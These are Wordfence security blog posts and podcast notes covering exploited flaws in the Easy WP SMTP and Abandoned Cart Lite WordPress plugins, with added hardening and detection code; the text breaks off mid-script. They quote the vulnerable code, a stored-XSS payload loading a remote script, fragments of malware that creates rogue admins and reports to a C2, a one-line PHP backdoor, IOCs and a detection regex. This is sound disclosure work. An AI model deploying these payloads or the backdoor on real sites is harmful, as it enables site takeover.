Podcast Episode 3: The Cory Miller Interview and Active Exploits Target Easy WP SMTP Plugin

Welcome to Think Like a Hacker, Episode 3. In this episode Mikey Veenstra, a threat analyst at Wordfence, discusses an active exploit in the Easy WP SMTP plugin. This is breaking news which we added to the podcast at the very last minute.

We also chat with Cory Miller, the founder and former CEO of iThemes about how he created his business, why he sold to Liquid Web, what it’s like being an entrepreneur and much more. You can find Cory on Twitter at @corymiller303. And as always we cover the news with Kathy Zant.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast.

This week in the news we cover:

You can find me on Twitter as @mmaunder, Kathy as @kathyzant, and Mikey as @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 3: The Cory Miller Interview and Active Exploits Target Easy WP SMTP Plugin appeared first on Wordfence.


Hackers Abusing Recently Patched Vulnerability In Easy WP SMTP Plugin

Over the weekend, a vulnerability was disclosed and patched in the popular WordPress plugin Easy WP SMTP. The plugin allows users to configure SMTP connections for outgoing email, and has a userbase of over 300,000 active installs. The vulnerability is only present in version 1.3.9 of the plugin, and all of the plugin’s users should update to 1.3.9.1 as quickly as possible to address the flaw.

This vulnerability is under active attack, being used by malicious actors to establish administrative control of affected sites en masse. We have released a firewall rule which prevents exploitation of the flaw, protecting Wordfence Premium sites which haven’t yet updated the affected plugin. Our free users will gain access to the new rule in thirty days, but they can protect themselves in the meantime by updating their plugins.

In today’s post, we’ll look at the vulnerability, how attackers are abusing it, and what users should do if they believe they’ve been put at risk.

Insufficient Access Controls In Import/Export Feature

The root of the vulnerability is in the Import/Export functionality which was added to Easy WP SMTP in version 1.3.9. The new code resides in the plugin’s admin_init hook, which executes in wp-admin/ scripts like admin-ajax.php and admin-post.php.

$is_import_settings = filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT );
if ( $is_import_settings ) {
    // No capability or nonce check has run at this point.
    $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' );
    if ( empty( $_FILES[ 'swpsmtp_import_settings_file' ] ) ) {
        echo $err_msg;
        wp_die();
    }
    $in_raw = file_get_contents( $_FILES[ 'swpsmtp_import_settings_file' ][ 'tmp_name' ] );
    try {
        // The uploaded file's contents go straight into unserialize().
        $in = unserialize( $in_raw );
        if ( empty( $in[ 'data' ] ) ) {
            echo $err_msg;
            wp_die();
        }
        if ( empty( $in[ 'checksum' ] ) ) {
            echo $err_msg;
            wp_die();
        }
        // The checksum is an unkeyed md5 of the uploaded data, so whoever
        // writes the file also writes a valid checksum.
        if ( md5( $in[ 'data' ] ) !== $in[ 'checksum' ] ) {
            echo $err_msg;
            wp_die();
        }
        $data = unserialize( $in[ 'data' ] );
        // Every key in the upload is written to wp_options, not just the plugin's own options.
        foreach ( $data as $key => $value ) {
            update_option( $key, $value );
        }
        set_transient( 'easy_wp_smtp_settings_import_success', true, 60 * 60 );
        $url = admin_url() . 'options-general.php?page=swpsmtp_settings';
        wp_safe_redirect( $url );
        exit;
    } catch ( Exception $e ) {
        // The plugin's exception handling is omitted from this excerpt.
    }
}

When this hook fires, the plugin checks for the existence of the POST parameter swpsmtp_import_settings. If this parameter is set to 1, it assumes that an import is taking place and checks for a file upload as swpsmtp_import_settings_file. The contents of the uploaded file are unserialized, and update_option is run on each given key/value pair.

A number of issues present themselves in this process.

First, and most importantly, no capabilities checks are performed during this process so an attacker does not need any special permissions to exploit this flaw.

Next, instead of running on a dedicated AJAX action, REST endpoint, or dashboard page, the importer looks for an import with every admin_init call. This means the code will run for unauthenticated users, as this call is made even for logged-out sessions. Without this element, an attacker would at least need subscriber-level access to a victim’s site.

Then, unsanitized user input is passed to unserialize(), which inherently creates an object injection vulnerability.

Lastly, any user-provided options are updated, rather than a set of plugin-specific options. This allows an attacker to alter any values in a site’s wp_options table, which is the activity taking place against vulnerable sites at this time.
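One way to close the four gaps just listed, as an added example written for this page (it is not the plugin's own code and not a reproduction of the 1.3.9.1 patch). It assumes it runs inside WordPress, that the import form posts to admin-post.php with the action swpsmtp_import_settings and carries a nonce field named swpsmtp_import_nonce, and that the option names in the allowlist are placeholders for whatever the plugin actually stores:

```php
<?php
/**
 * Hardened settings importer (added example; not the Easy WP SMTP code and
 * not its 1.3.9.1 patch). Assumptions: runs inside WordPress; the import form
 * posts to admin-post.php with action=swpsmtp_import_settings and a nonce
 * field named swpsmtp_import_nonce; the option names in the allowlist are
 * placeholders for the plugin's real option names.
 */

// Only options the plugin owns may be written by an import (issue 4).
const SWPSMTP_IMPORTABLE_OPTIONS = array(
    'swpsmtp_options',       // placeholder option name
    'swpsmtp_enable_debug',  // placeholder option name
);

// A dedicated admin-post action instead of admin_init (issue 2): the handler
// runs only for this action, and a logged-out request to admin-post.php fires
// only the admin_post_nopriv_ variant, which this code never registers.
add_action( 'admin_post_swpsmtp_import_settings', 'swpsmtp_handle_import' );

function swpsmtp_handle_import() {
    $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' );

    // Capability check (issue 1): importing settings is an administrator task.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html( $err_msg ), '', array( 'response' => 403 ) );
    }

    // Nonce check: the request must originate from a form this user loaded.
    check_admin_referer( 'swpsmtp_import_settings', 'swpsmtp_import_nonce' );

    $file = $_FILES['swpsmtp_import_settings_file'] ?? null;
    if ( empty( $file['tmp_name'] ) || ! is_uploaded_file( $file['tmp_name'] ) ) {
        wp_die( esc_html( $err_msg ) );
    }

    $settings = swpsmtp_decode_import( (string) file_get_contents( $file['tmp_name'] ) );
    if ( null === $settings ) {
        wp_die( esc_html( $err_msg ) );
    }

    foreach ( $settings as $key => $value ) {
        update_option( $key, $value );
    }

    set_transient( 'easy_wp_smtp_settings_import_success', true, HOUR_IN_SECONDS );
    wp_safe_redirect( admin_url( 'options-general.php?page=swpsmtp_settings' ) );
    exit;
}

/**
 * Decode an export file without unserialize() (issue 3): JSON cannot
 * instantiate PHP objects, so there is no object-injection surface. Only
 * allowlisted keys survive. Note that an unkeyed md5 "checksum" like the
 * original's proves nothing about who produced the file; authorization,
 * not a checksum, is the control that matters here.
 */
function swpsmtp_decode_import( string $raw ): ?array {
    $decoded = json_decode( $raw, true, 8 );
    if ( ! is_array( $decoded ) ) {
        return null;
    }
    $clean = array();
    foreach ( SWPSMTP_IMPORTABLE_OPTIONS as $key ) {
        if ( array_key_exists( $key, $decoded ) ) {
            $clean[ $key ] = swpsmtp_sanitize_value( $decoded[ $key ] );
        }
    }
    return $clean;
}

// Recursively sanitize scalars; per-option validation (ports, booleans,
// host names) would be added here for each real option.
function swpsmtp_sanitize_value( $value ) {
    if ( is_array( $value ) ) {
        return array_map( 'swpsmtp_sanitize_value', $value );
    }
    return sanitize_text_field( (string) $value );
}
```

The order of checks is deliberate: the capability test runs before the nonce test and before any file is read, so an unauthenticated or low-privilege request is rejected without touching the upload, and the allowlist means that even a valid import from an administrator cannot change default_role or users_can_register.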

Exploit Campaigns Taking Over Vulnerable Sites

The Defiant Threat Intelligence team is actively tracking activity from two distinct threat actors associated with this vulnerability.

Both of the campaigns launch their initial attacks identically, by using the proof of concept (PoC) exploit detailed in NinTechNet’s original disclosure of the vulnerability. These attacks match the PoC exactly, down to the checksum, and enable users to register administrator accounts by changing default_role to “administrator”, and enabling users_can_register. Then, the attacker uses these new settings to register an administrator user for themselves.

From here, the campaigns diverge. The first threat actor’s activity stops after this point, suggesting that this stage was the only automated step of their process and they’re just assembling a number of rogue admin accounts for later use.

The other campaign continues by altering the victim site’s siteurl and home options to trigger malicious redirects when the site is visited, then injecting malicious <script> tags into all PHP files on the affected site with the string “index” present in their name. This obviously affects files named index.php, but also happens to impact files like class-link-reindex-post-service.php, present in Yoast’s SEO plugin.

In these cases, we’ve identified two domains used in the options values and script injections: setforconfigplease[.]com, and getmyfreetraffic[.]com. These domains are followed by an alphanumeric path string, presumably used much like affiliate tracking codes to identify the source of the newly created traffic. When encountered by a user, the redirecting sites check for and assign cookies to track these users and determine where to redirect them. The most common redirects seen from these sources are tech support scams warning that users’ computers may be affected by the Zeus virus, among others.

Notably, both of these domains resolve to the same host IP address, which also hosts the malicious domains somelandingpage[.]com and setforspecialdomain[.]com, both of which have been seen in similar attack campaigns.

Next Steps

The attacks against this vulnerability are widespread, and successful exploits can grant full control of vulnerable sites to the attackers. As always, it’s important for users to regularly update their plugins in order to apply the security patches for vulnerabilities like these. Easy WP SMTP version 1.3.9.1 prevents unauthenticated access to the import script, as well as restricting affected options to only include expected values.

For typical WordPress users, if you believe your site may have been compromised as a result of this or any other vulnerability, consider reaching out to our team for a site cleaning. Otherwise, be on the lookout for the following indicators of compromise (IOCs):

  • Logged traffic from the following IPs:
    • 185.212.131.45
    • 185.212.128.22
    • 185.212.131.46
    • 86.109.170.200
  • Database siteurl and home values not matching their intended values, especially including the following domains:
    • setforconfigplease[.]com
    • getmyfreetraffic[.]com
  • Administrator accounts present for unknown users. For example:
    • devidpentesting99
    • larryking99
  • Malicious <script> tags injected into the first line of index.php files. For example:
    • <script type='text/javascript' async src='hXXps://setforspecialdomain[.]com/in2herg42t2?type=in2&frm=scr&'></script>
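The following script checks for the indicators listed above; it is an added example written for this page, not code from the post. The IP addresses and domains are the post's own IOCs, written defanged exactly as they appear above and re-fanged at runtime; every file and log line it operates on is constructed test data created in a temporary directory, so it runs offline with `php ioc_check.php`. Pointing find_injected_index_files() at a real web root and log_lines_from_ioc_ips() at real access-log lines is the intended use.

```php
<?php
/**
 * Checks for the indicators listed above (added example, not code from the
 * Wordfence post). IPs and domains are the post's IOCs, kept defanged and
 * re-fanged at runtime; the files and log lines below are constructed.
 * Run with: php ioc_check.php
 */

const IOC_IPS = array( '185.212.131.45', '185.212.128.22', '185.212.131.46', '86.109.170.200' );
const IOC_DOMAINS = array(
    'setforconfigplease[.]com', 'getmyfreetraffic[.]com',
    'somelandingpage[.]com', 'setforspecialdomain[.]com',
);

function refang( string $defanged ): string {
    return str_replace( array( '[.]', 'hXXp' ), array( '.', 'http' ), $defanged );
}

// The campaign prepends its <script> tag to the first line of the file.
function first_line_has_script_tag( string $path ): bool {
    $fh = fopen( $path, 'rb' );
    if ( false === $fh ) { return false; }
    $first = (string) fgets( $fh, 8192 );
    fclose( $fh );
    return false !== stripos( $first, '<script' );
}

// Walk a web root and return PHP files with "index" in their name whose first
// line carries a <script> tag (index.php, but also files such as
// class-link-reindex-post-service.php).
function find_injected_index_files( string $root ): array {
    $hits = array();
    $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $root, FilesystemIterator::SKIP_DOTS ) );
    foreach ( $it as $file ) {
        if ( 'php' !== strtolower( $file->getExtension() ) || false === stripos( $file->getFilename(), 'index' ) ) {
            continue;
        }
        if ( first_line_has_script_tag( $file->getPathname() ) ) {
            $hits[] = $file->getPathname();
        }
    }
    sort( $hits );
    return $hits;
}

// Does a siteurl/home value point at one of the campaign domains (or a subdomain)?
// Returns the matching defanged domain, or null.
function option_points_to_ioc_domain( string $url ): ?string {
    $host = strtolower( (string) parse_url( refang( $url ), PHP_URL_HOST ) );
    foreach ( IOC_DOMAINS as $defanged ) {
        $d = refang( $defanged );
        $suffix = '.' . $d;
        if ( $host === $d || substr( $host, -strlen( $suffix ) ) === $suffix ) {
            return $defanged;
        }
    }
    return null;
}

// Common/combined log format: the client IP is the first token of each line.
function log_lines_from_ioc_ips( array $lines ): array {
    return array_values( array_filter( $lines, function ( $line ) {
        return in_array( strtok( $line, ' ' ), IOC_IPS, true );
    } ) );
}

// --- Constructed demonstration data ---
$root = sys_get_temp_dir() . '/ioc_demo_' . bin2hex( random_bytes( 4 ) );
$seo  = $root . '/wp-content/plugins/wordpress-seo/src';
mkdir( $seo, 0700, true );
$payload = "<script type='text/javascript' async src='hXXps://setforspecialdomain[.]com/in2herg42t2?type=in2&frm=scr&'></script>";
file_put_contents( "$root/index.php", $payload . "<?php\n// constructed: injected\n" );
file_put_contents( "$seo/class-link-reindex-post-service.php", "<?php\n// constructed: clean\n" );
file_put_contents( "$seo/functions.php", $payload . "<?php\n// constructed: injected, but outside the name pattern this check covers\n" );

$log = array( // constructed access-log lines
    '185.212.131.45 - - [01/Jan/2019:10:00:01 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 -',
    '203.0.113.9 - - [01/Jan/2019:10:00:02 +0000] "GET / HTTP/1.1" 200 5120',
    '86.109.170.200 - - [01/Jan/2019:10:00:03 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 -',
);

print_r( find_injected_index_files( $root ) );
print_r( log_lines_from_ioc_ips( $log ) );
var_dump( option_points_to_ioc_domain( 'hXXps://getmyfreetraffic[.]com/abc123' ) );
var_dump( option_points_to_ioc_domain( 'https://example.com' ) );

// Remove the constructed tree.
$walk = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $root, FilesystemIterator::SKIP_DOTS ), RecursiveIteratorIterator::CHILD_FIRST );
foreach ( $walk as $p ) { $p->isDir() ? rmdir( $p->getPathname() ) : unlink( $p->getPathname() ); }
rmdir( $root );
```

The constructed functions.php is deliberately left out of the name pattern to make the limit of the check visible: the post describes injections into files with "index" in their name, so a broader sweep of every PHP file's first line is the conservative choice on a site you suspect is compromised.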

As this situation shows, the time between the publication of vulnerability details and the first round of attacks can be incredibly short. Even the most fastidious site owners can be caught unaware and left open to attack. A firewall backed by a team focused 100% on WordPress security is must-have insurance for these situations. If your site matters to you, consider upgrading to Wordfence Premium to guard against future vulnerabilities of this nature.

The post Hackers Abusing Recently Patched Vulnerability In Easy WP SMTP Plugin appeared first on Wordfence.


Podcast Episode 2: Mikey Veenstra Talks XSS Vulnerability + The Adam Warner Interview

Welcome to Think Like a Hacker, Episode 2. In this episode Mikey Veenstra, a threat analyst at Wordfence, discusses a serious XSS vulnerability in an abandoned cart plugin. We also chat with Adam Warner, a well-known figure in the WordPress community. In our interview we chat about Adam’s personal WordPress journey, community engagement success and the future of WordPress. You can find Adam on Twitter at @wpmodder. And as always we cover the news with Kathy Zant.

Find us on iTunes, Spotify, YouTube, SoundCloud, TuneIn and Stitcher. More platforms coming soon!

Click here to download an MP3 version of this podcast.

This week in the news we cover:

  • The web just took a big step toward a password-free future with WebAuthn. The Worldwide Web Consortium approved the WebAuthn standard on March 4. We look at how it works, why this is important, and what it means for WordPress.
  • A marketing company left a massive database of detailed marketing data exposed. Security researchers discovered the database, including a trove of personally identifiable information about over 800 million people.
  • Researchers have discovered a collection of MongoDBs containing information collected by China about their citizens from a variety of platforms, tied to individual profiles and distributed to police across the country.
  • It’s been 30 years of the web, and Sir Tim Berners-Lee wrote a blog post about the state of the web and some thoughts on where we’re going next.

You can find me on Twitter as @mmaunder, Kathy as @kathyzant, and Mikey as @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 2: Mikey Veenstra Talks XSS Vulnerability + The Adam Warner Interview appeared first on Wordfence.


XSS Vulnerability in Abandoned Cart Plugin Leads To WordPress Site Takeovers

Last month, a stored cross-site scripting (XSS) flaw was patched in version 5.2.0 of the popular WordPress plugin Abandoned Cart Lite For WooCommerce. The plugin, which we’ll be referring to by its slug woocommerce-abandoned-cart, allows the owners of WooCommerce sites to track abandoned shopping carts in order to recover those sales. A lack of sanitization on both input and output allows attackers to inject malicious JavaScript payloads into various data fields, which will execute when a logged-in user with administrator privileges views the list of abandoned carts from their WordPress dashboard.

At this time, any WordPress sites making use of woocommerce-abandoned-cart, or its premium version, woocommerce-abandoned-cart-pro, are advised to update to the latest available version as soon as possible. Sites making use of the Wordfence WAF, both free and premium, are protected from the attacks detailed in this post due to the firewall’s built-in XSS protection. Affected users without Wordfence installed should consider a Site Security Audit to confirm the integrity of their WordPress sites.

In today’s post, we’ll take a look at the details of this vulnerability, how attackers are exploiting it in the wild to take over sites, and what site owners should do if they believe they’ve been attacked.

XSS Vulnerability In Detail

The guest-input side of woocommerce-abandoned-cart begins when an unauthenticated user builds a shopping cart and begins the checkout process.

An example of the Billing Details page on a basic WooCommerce site. This data is stored by woocommerce-abandoned-cart in case checkout isn’t completed.

With the plugin active, all of the data input by the guest is sent back to the plugin using the save_data AJAX action. The intent is that, if the checkout process is not completed (whether the shopper navigated away from the page, closed the browser, or simply got distracted), the plugin can inform the shop’s owners within their dashboard.

function save_data() {
    if ( ! is_user_logged_in() ) {
        global $wpdb, $woocommerce;
        // Each field is stored exactly as it arrives in $_POST; no sanitize_text_field() or similar.
        if ( isset( $_POST['billing_first_name'] ) && $_POST['billing_first_name'] != '' ) {
            wcal_common::wcal_set_cart_session( 'billing_first_name', $_POST['billing_first_name'] );
        }
        if ( isset( $_POST['billing_last_name'] ) && $_POST['billing_last_name'] != '' ) {
            wcal_common::wcal_set_cart_session( 'billing_last_name', $_POST['billing_last_name'] );
        }
        if ( isset( $_POST['billing_company'] ) && $_POST['billing_company'] != '' ) {
            wcal_common::wcal_set_cart_session( 'billing_company', $_POST['billing_company'] );
        }
        // The remaining billing and shipping fields follow the same pattern (excerpt truncated here).
    }
}

However, the function used to handle these AJAX requests fails to perform any input sanitization on the various $_POST fields it receives. As shown in the above snippet, shopper data fields like billing_first_name, billing_last_name, and billing_company are stored directly as they were received. The data pulled from this request is stored in the WordPress database, and can be accessed by an administrator from their dashboard. There, they can view the individual carts, their customer information, and order totals.

An abandoned cart, patiently waiting to be recovered.

When this data is rendered in the administrator’s browser, no output sanitization takes place either. Particularly, billing_first_name and billing_last_name are concatenated into a single “Customer” field in the output table. This field is what hackers are targeting in active campaigns against this flaw.
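To make the two missing controls concrete, here is an added example (written for this page, not the plugin's code) that stores and renders the same first/last-name pair both ways. It assumes that, when run outside WordPress, the two stand-ins defined at the top substitute for WordPress's sanitize_text_field() and esc_html(); inside WordPress the real functions would be used. The request data is constructed to follow the pattern the post describes for the active campaign.

```php
<?php
/**
 * Input sanitization versus output escaping for the "Customer" field (added
 * example, not the plugin's code). Assumption: outside WordPress the two
 * stand-ins below replace sanitize_text_field() and esc_html(); inside
 * WordPress the real functions are used. Run with: php xss_demo.php
 */

if ( ! function_exists( 'sanitize_text_field' ) ) {
    // Stand-in approximating WordPress: strip tags, drop control characters,
    // collapse whitespace.
    function sanitize_text_field( $str ) {
        $str = strip_tags( (string) $str );
        $str = preg_replace( '/[\x00-\x1F\x7F]+/', ' ', $str );
        return trim( preg_replace( '/\s+/', ' ', $str ) );
    }
}
if ( ! function_exists( 'esc_html' ) ) {
    // Stand-in approximating WordPress: HTML-encode <, >, &, and quotes.
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}

// Constructed request following the observed pattern: a plausible name in
// billing_first_name, the payload in billing_last_name.
const CONSTRUCTED_POST = array(
    'billing_first_name' => 'Jane Doe',
    'billing_last_name'  => '<script src=hXXps://bit[.]ly/2SzpVBY></script>',
);

// Vulnerable save: fields stored exactly as received.
function store_cart_as_received( array $post ): array {
    return array(
        'billing_first_name' => $post['billing_first_name'] ?? '',
        'billing_last_name'  => $post['billing_last_name'] ?? '',
    );
}

// Hardened save: text fields sanitized before they reach the database.
function store_cart_sanitized( array $post ): array {
    return array(
        'billing_first_name' => sanitize_text_field( $post['billing_first_name'] ?? '' ),
        'billing_last_name'  => sanitize_text_field( $post['billing_last_name'] ?? '' ),
    );
}

// Vulnerable render: first and last name concatenated straight into the cell.
function render_customer_raw( array $cart ): string {
    return '<td>' . $cart['billing_first_name'] . ' ' . $cart['billing_last_name'] . '</td>';
}

// Hardened render: escape at the point of output. This is the control that
// also neutralises rows stored before any input-side fix shipped.
function render_customer_escaped( array $cart ): string {
    return '<td>' . esc_html( $cart['billing_first_name'] . ' ' . $cart['billing_last_name'] ) . '</td>';
}

// Mirrors the rule in the vendor's database cleanup: blank any value containing '<'.
function cleanup_values_with_angle_bracket( array $cart ): array {
    foreach ( $cart as $key => $value ) {
        if ( false !== strpos( $value, '<' ) ) {
            $cart[ $key ] = '';
        }
    }
    return $cart;
}

$stored_raw = store_cart_as_received( CONSTRUCTED_POST );

echo "Raw store + raw render (script tag reaches the admin's browser intact):\n";
echo render_customer_raw( $stored_raw ), "\n\n";

echo "Raw store + escaped render (same stored row, tag rendered as inert text):\n";
echo render_customer_escaped( $stored_raw ), "\n\n";

echo "Sanitized store + raw render (tag never reaches the database):\n";
echo render_customer_raw( store_cart_sanitized( CONSTRUCTED_POST ) ), "\n\n";

echo "Cleanup of an existing row, then raw render (the whole field is emptied):\n";
echo render_customer_raw( cleanup_values_with_angle_bracket( $stored_raw ) ), "\n";
```

The second case is the important one for sites that already hold injected rows: escaping on output defuses whatever is in the database, whereas input sanitization and the `LIKE '%<%'` cleanup only help with rows they actually touch.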

Malicious JavaScript Hijacking Admin Sessions

The attacks on this vulnerability have been consistent in their execution. The attacker builds a cart, supplies bogus contact information, and abandons the cart. The names and emails are random, but the requests follow the same pattern: the generated first and last name are supplied together as billing_first_name, but the billing_last_name field contains the injected payload <script src=hXXps://bit[.]ly/2SzpVBY></script>.

Malware campaigns making use of URL shortening services like bit.ly are common. In addition to providing a basic layer of abstraction between the malicious request and the actual URL of the script, the shorter addresses make it easier to beat string length restrictions (especially when bypass techniques are employed, which isn’t the case in this scenario). Not only that, but if the domain at the other end of the URL shortener is taken down, the attacker can just point the bit.ly address at a new domain and keep all of their previous injections alive.

In this case, the bit.ly address resolves to hXXps://cdn-bigcommerce[.]com/visionstat.js. The domain, which attempts to look innocuous by impersonating the legitimate cdn.bigcommerce.com, points to the command and control (C2) server behind the infection. The target script, visionstat.js, is a malicious JavaScript payload which uses the victim’s own browser session to deploy backdoors on their site. Two backdoors are deployed: a rogue administrator account is created, and a deactivated plugin is infected with a code execution script. Both actions are executed by creating a hidden iframe in the admin’s existing browser window, then simulating the process of filling out and submitting the necessary forms within it.

function processNewUser(adminhref){
	var username = 'woouser';
	var email = 'woouser401a@mailinator.com';
	var password = 'K1YPRka7b0av1B';
	
	pfr=document.createElement('iframe');
	pfr.style.visibility='hidden';
	pfr.name='pfr';
	pfr.src=adminhref+'/user-new.php';

In the first backdoor, a hidden iframe is created which opens the new user creation form. This form is filled out with the information from the first few lines of the function seen above, with a username of “woouser” and an email address at Mailinator, a popular disposable inbox provider. The user is given the Administrator role, and the account is created.

When this new user is created, the attacker is notified in two ways. First, the visionstat.js payload makes an AJAX call to hXXps://cdn-bigcommerce[.]com/counterstat.php to phone home to its C2 with the URL of the compromised site. Second, the WordPress application running on the site will generate a new user notification email, which is sent to the Mailinator inbox associated with the rogue administrator account.

for (var at = 0; at < fl.length; at++) {
	try{
		if(fl[at].href.indexOf('action=activate&plugin=')>0){
			funcURL = fl[at].href.match(/action=activate&plugin=([^&]+)/)[1];

			//console.log(funcURL);
			break;
		}
	}catch(e){
	}
}
//console.log(funcURL);
if (funcURL == '')
{
	maindata.details = "Error: No disabled plugins!";
	SendData(maindata);
}
else
{
	maindata.details = "Found disabled plugin (" + funcURL + ")";
	SendData(maindata);
	processPluginEdit(adminhref, pfr1, funcURL);
}

For the second backdoor, visionstat.js opens another hidden iframe, this time to the site’s Plugins menu. There, it scans the list of installed plugins for an “Activate” link, which signifies an inactive plugin is present. Then, new content is injected into the inactive plugin, containing a simple PHP backdoor script.

<?php @extract($_REQUEST);@die($cdate($adate));

By sending a POST request to this script containing a PHP function as the cdate parameter, and an argument for that function as adate, they are able to perform a variety of actions, from executing arbitrary PHP code to running system commands on the compromised server. As with the creation of a rogue administrator, visionstat.js also phones home to the C2 server to inform the attacker that this backdoor was successfully deployed.

Plugin Vendor Deploys Unique Patch

Tyche Softwares, the plugin’s vendor, was made aware of the vulnerability via user reports on the WordPress.org forums. A patch was quickly released, and a security notice was posted in the plugin’s changelog. The patched version of the plugin applies WordPress’s built-in sanitize_text_field function to prevent the injection of new scripts.

            if ( 'yes' !== get_option( 'ac_lite_user_cleanup' ) ) {
                $query_cleanup = "UPDATE `".$wpdb->prefix."ac_guest_abandoned_cart_history_lite` SET 
                    billing_first_name = IF (billing_first_name LIKE '%<%', '', billing_first_name),
                    billing_last_name = IF (billing_last_name LIKE '%<%', '', billing_last_name),
                    billing_company_name = IF (billing_company_name LIKE '%<%', '', billing_company_name),
                    billing_address_1 = IF (billing_address_1 LIKE '%<%', '', billing_address_1),
                    billing_address_2 = IF (billing_address_2 LIKE '%<%', '', billing_address_2),
                    billing_city = IF (billing_city LIKE '%<%', '', billing_city),
                    billing_county = IF (billing_county LIKE '%<%', '', billing_county),
                    billing_zipcode = IF (billing_zipcode LIKE '%<%', '', billing_zipcode),
                    email_id = IF (email_id LIKE '%<%', '', email_id),
                    phone = IF (phone LIKE '%<%', '', phone),
                    ship_to_billing = IF (ship_to_billing LIKE '%<%', '', ship_to_billing),
                    order_notes = IF (order_notes LIKE '%<%', '', order_notes),
                    shipping_first_name = IF (shipping_first_name LIKE '%<%', '', shipping_first_name),
                    shipping_last_name = IF (shipping_last_name LIKE '%<%', '', shipping_last_name),
                    shipping_company_name = IF (shipping_company_name LIKE '%<%', '', shipping_company_name),
                    shipping_address_1 = IF (shipping_address_1 LIKE '%<%', '', shipping_address_1),
                    shipping_address_2 = IF (shipping_address_2 LIKE '%<%', '', shipping_address_2),
                    shipping_city = IF (shipping_city LIKE '%<%', '', shipping_city),
                    shipping_county = IF (shipping_county LIKE '%<%', '', shipping_county)";

                $wpdb->query( $query_cleanup );

                $email = 'woouser401a@mailinator.com';
                $exists = email_exists( $email );
                if ( $exists ) {
                    wp_delete_user( esc_html( $exists ) );
                }

                update_option( 'ac_lite_user_cleanup', 'yes' );
            }

In a rather direct attempt to address the active exploitation of this vulnerability, the developers also implemented a cleanup function in the patched version of their plugin. This function first performs a scan of the existing abandoned cart data, and removes any entries where a < symbol is encountered, which prevents subsequent execution of the malicious <script src=hXXps://bit[.]ly/2SzpVBY></script> payloads that may be present.

The next block of code is the interesting one, though. Because the plugin’s developers were made aware of this flaw due to reports of these same exploits, they include a check for the existence of the email address registered with the malicious “woouser” account. If a user with this email is identified, the plugin deletes that user.

Next Steps

While these are clever steps in addressing current incarnations of this campaign, it’s important that site owners don’t rely on these measures alone. This patch does not detect or remove the secondary backdoors injected into inactive plugins, and the nature of the initial XSS payload allows the email address of newly created rogue admins to be changed with very little effort by modifying the visionstat.js script hosted on the C2 site, or by changing the target of the bit.ly shortlink. The patch also leaves output sanitization untouched, meaning preexisting injected scripts can still execute in the dashboard if the cleanup function fails to remove them for any reason.

Our recommendation for site owners using either woocommerce-abandoned-cart or woocommerce-abandoned-cart-pro is to review their database contents for possible script injections. The exact name of the table to check will vary depending on your database prefix and the Lite/Pro status of your installed plugin, but guest shopper data can be found in the table with ac_guest_abandoned_cart_history in its name. After this check has been completed, review the user accounts present on your site. If any unauthorized administrator accounts are present, delete them immediately and begin your incident response process.
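A read-only triage script for the review recommended above, as an added example (not the plugin's or Wordfence's code). It assumes it runs inside WordPress, for instance with WP-CLI via `wp eval-file abandoned-cart-triage.php`; it locates the guest-cart table from the site's own prefix so the Lite and Pro variants are both found, assumes that table carries the column names seen in the vendor's cleanup query, and derives its backdoor pattern from the one-line PHP script quoted earlier in the post. It reports and changes nothing.

```php
<?php
/**
 * Read-only post-patch triage (added example; not the plugin's or Wordfence's
 * code). Assumed to run inside WordPress, e.g. via WP-CLI:
 *   wp eval-file abandoned-cart-triage.php
 * Assumes the guest-cart table uses the column names from the vendor's
 * cleanup query. Nothing here modifies the site.
 */

require_once ABSPATH . 'wp-admin/includes/plugin.php';

// 1. Guest-cart tables: prefix + ac_guest_abandoned_cart_history + Lite/Pro suffix.
function act_cart_tables( wpdb $db ): array {
    $like = $db->esc_like( $db->prefix . 'ac_guest_abandoned_cart_history' ) . '%';
    return (array) $db->get_col( $db->prepare( 'SHOW TABLES LIKE %s', $like ) );
}

// Rows whose text fields contain a '<', the same signal the vendor's cleanup used.
function act_rows_with_markup( wpdb $db, string $table ): array {
    $fields = array( 'billing_first_name', 'billing_last_name', 'billing_company_name',
                     'email_id', 'order_notes', 'shipping_first_name', 'shipping_last_name' );
    $where  = implode( ' OR ', array_map( function ( $f ) { return "`$f` LIKE '%<%'"; }, $fields ) );
    // $table comes from SHOW TABLES output, not from a request, so interpolating it is safe.
    return (array) $db->get_results( "SELECT * FROM `$table` WHERE $where", ARRAY_A );
}

// 2. Administrators, for comparison against the people who should have access.
function act_admin_accounts(): array {
    $out = array();
    foreach ( get_users( array( 'role' => 'administrator' ) ) as $u ) {
        $out[] = sprintf( '%s <%s> registered %s', $u->user_login, $u->user_email, $u->user_registered );
    }
    return $out;
}

// 3. Inactive plugins: extract() of a superglobal followed within a few hundred
//    bytes by a variable-function call, the shape of the quoted backdoor.
function act_backdoor_hits_in_inactive_plugins(): array {
    $pattern = '/extract\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\).{0,300}?\$\w+\s*\(\s*\$\w+\s*\)/s';
    $hits = array();
    foreach ( array_keys( get_plugins() ) as $plugin_file ) {
        if ( is_plugin_active( $plugin_file ) ) {
            continue;
        }
        $base = WP_PLUGIN_DIR . '/' . $plugin_file;
        // Single-file plugins have no directory component; scan the file itself.
        $paths = ( false === strpos( $plugin_file, '/' ) ) ? array( $base ) : act_php_files_under( dirname( $base ) );
        foreach ( $paths as $path ) {
            if ( preg_match( $pattern, (string) file_get_contents( $path ), $m ) ) {
                $hits[] = $path . ' :: ' . substr( $m[0], 0, 80 );
            }
        }
    }
    return $hits;
}

function act_php_files_under( string $dir ): array {
    $files = array();
    $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS ) );
    foreach ( $it as $f ) {
        if ( 'php' === strtolower( $f->getExtension() ) ) {
            $files[] = $f->getPathname();
        }
    }
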